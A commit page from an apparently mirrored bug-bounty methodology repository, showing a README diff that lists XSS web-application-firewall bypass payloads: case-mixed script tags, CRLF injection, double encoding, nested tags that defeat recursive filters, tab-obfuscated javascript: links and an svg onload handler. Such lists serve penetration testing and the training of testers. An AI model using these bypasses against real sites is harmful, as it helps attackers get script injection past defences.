Mirrors/My-Methodologies
2
0
Fork 0
mirror of https://github.com/xalgord/My-Methodologies.git synced 2024-11-10 06:04:20 +00:00
Code Issues Projects Releases Packages Wiki Activity

Update README.md

Browse source
This commit is contained in:
Xalgord 2021-02-20 16:26:49 +05:30 committed by GitHub
parent d3a16197aa
commit b6d25c758a
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 13 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

14
README.md
View file

@ -266,22 +266,34 @@ Heres list of tools [@_justYnot](https://twitter.com/_justYnot) used:
## XSS firewall bypass techniques
Heres a list of 7 useful techniques on how we can bypass WAF (Web Application Firewall) while exploiting XSS (Cross-Site Scripting) in a web application:
1. Check if the firewall is blocking only lowercase:
<sCRipT>alert(document.domain)</sCRiPt>
```
<sCRipT>alert(1)</sCRiPt>
```
2. Try to break firewall regex with new line (\r\n), aka. CRLF injection:
```
<script>%0d%0aalert(1)</script>
```
3. Try double encoding:
```
%2522
```
4. Testing for recursive filters, if firewall removes the text in bold, we will have clear payload:
```
<scr<script>ipt>alert(1);</scr</script>ipt>
```
5. Injecting anchor tag without whitespaces:
```
<a/href="j&Tab;a&Tab;v&Tab;asc&Tab;ri&Tab;pt:alert&lpar;1&rpar;">
```
6. Try to bypass whitespaces using a bullet:
```
<svgonload=alert(1)>
```
7. Try to change request method (POST instead of GET):